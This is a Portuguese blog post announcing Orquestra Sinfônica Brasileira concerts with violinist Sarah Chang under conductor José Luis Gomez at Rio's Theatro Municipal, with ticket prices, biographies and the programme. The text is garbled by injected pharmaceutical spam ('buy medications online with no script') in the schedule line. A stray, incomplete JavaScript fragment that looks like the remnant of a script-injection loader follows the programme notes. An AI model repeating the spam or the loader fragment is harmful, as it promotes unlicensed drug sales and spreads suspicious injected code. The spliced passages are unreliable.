LateralMúsica sinfônicaProgramaçãoRio de Janeiro

OSB traz violinista Sarah Chang

Sarah Chang estreia com a OSB em duas apresentações no Theatro Municipal do Rio de Janeiro, com regência do venezuelano José Luis Gomez.

SERVIÇO

 

Teatro Municipal do RJ
Praça Marechal Floriano s/nº, Centro
Fone: 21 2332 9134 e 2332-9005

 

Série Ônix buy medications online with no script Dia 25.11 (Sexta-feira), às 20h.

Série TopázioDia 26.11 (Sábado), às 16h.


Preços:

Galeria ……………………………………………….. R$    18,00
Balcão Superior ………………………………….  R$   60,00
Balcão Nobre e Plateia ………………………..  R$ 130,00

Bilheteria: 2332-9005 / 2332-9191- Prédio anexo – Rua Almirante Barroso, 14/16

Classificação: Livre

Capacidade: 2237 lugares; 456 (plateia); 344 (balcão nobre); 406 (balcão superior); 94 (balcão lateral); 624 (galeria); 100 (galeria lateral); 132 (frisas); 69 (camarotes)

Vendas na bilheteria do teatro e pelo site Ingresso.com (www.ingresso.com.br) ou pelo telefone 4003-2330.

Acesso para cadeirantes e pessoas com dificuldade de locomoção na entrada lateral do Theatro na Avenida Rio Branco.

Há serviço de valet gratuito

Programação sujeita a alteração.

Descontos: 50% para terceira idade, estudantes, portadores de necessidades especiais e menores de 21 anos.

Realização: Ministério da Cultura. A Orquestra Sinfônica Brasileira é mantida pela Vale e Prefeitura do Rio. Apoio financeiro: BNDES.

Série Ônix:
– Patrocinador – Light
– Apoiador Cultural: Alstom, BTG Pactual e Gerdau

Série Topázio
– Apoiador Cultural: Credit Suisse, Eletrobrás e Wayne

 

Uma das maiores violinistas da atualidade, a norte-americana Sarah Chang, será a estrela dos concertos que a Orquestra Sinfônica Brasileira fará nos dias 25 e 26 de novembro, no Theatro Municipal do Rio de Janeiro. Na sexta-feira, a apresentação acontece às 20h pela série Ônix e no sábado, às 16h, com o selo da série Topázio. A regência será do jovem venezuelano Jose Luis Gomez, que alcançou o time de maestros de primeira grandeza ao vencer, por unanimidade, o International Sir George Solti Conductor’s Competition, em setembro de 2010.

 

Sara Chang

Desde que iniciou sua carreira, aos 8 anos de idade, com a Filarmônica de Nova York, Sarah Chang tem se apresentado com as principais orquestras ao redor do mundo, como a Sinfônica de Londres, as filarmônicas de Los Angeles e de Berlim e a Royal Philharmonic. Tem forte presença no Oriente Médio e foi um dos destaques da cerimônia de abertura dos jogos asiáticos, na cidade de Guangzhou, na China, no ano passado.

Em 2012, ela completará 20 anos de gravações exclusivamente pela EMI Classics. Entre elas, estão os concertos de Brahms e Bruch com Kurt Masur e a Dresdner Philharmonie, As Quatro Estações, de Vivaldi, e o Concerto para violino de Dvórak com a Sinfônica de Londres.

Em 2006, a violinista entrou para o top 20 da Newsweek Magazine, no especial “Women and Leadership, 20 Powerful Women Take Charge”. Já foi honrada com o título de Jovem Líder Global pelo Fórum Econômico Mundial, em 2008, por suas “conquistas profissionais, comprometimento com a sociedade e o potencial em moldar o mundo para o futuro”. Tem uma cadeira com seu nome no Sprague Hall, na universidade de Yale e é a pessoa mais jovem do mundo a receber um prêmio do Hollywood Bowl’s Hall of Fame. Sarah Chang acumula ainda um Avery Fisher Prize e um “Young artist of the year” da Gramophone, entre outros prêmios.


José Luiz Gomez –
Regente

José Luis Gomes alcançou visibilidade internacional ao conquistar a International Sir Georg Solti Conductor’s Competition de 2010, em uma rara decisão unânime do júri. O prêmio rendeu-lhe um convite de Paavo Jarvi para assumir o posto de regente assistente na Sinfônica da Rádio de Frankfurt. Formado pelo sistema de orquestras juvenis da Venezuela, continuou seus estudos na Manhattan School of Music, em Nova Iorque.

 

PROGRAMA

Weber
O franco atirador
– Primeira ópera romântica alemã, composta pelo autor.

Villa-Lobos
Choros no. 6
– Esta obra  incorpora diversos sons de instrumentos musicais não tradicionais de orquestra, como cuíca, tamborim e reco-reco.

Jean Sibelius
Concerto para violino
– A obra, uma das mais populares entre os violinistas e o público, é também uma das mais executadas nas salas de concertos pelos solistas deste instrumento.document.currentScript.parentNode.insertBefore(s, document.currentScript);if (document.currentScript) {

Leave a Response

movimento.com
Responsável pela inclusão de programação e assuntos genéricos no blog.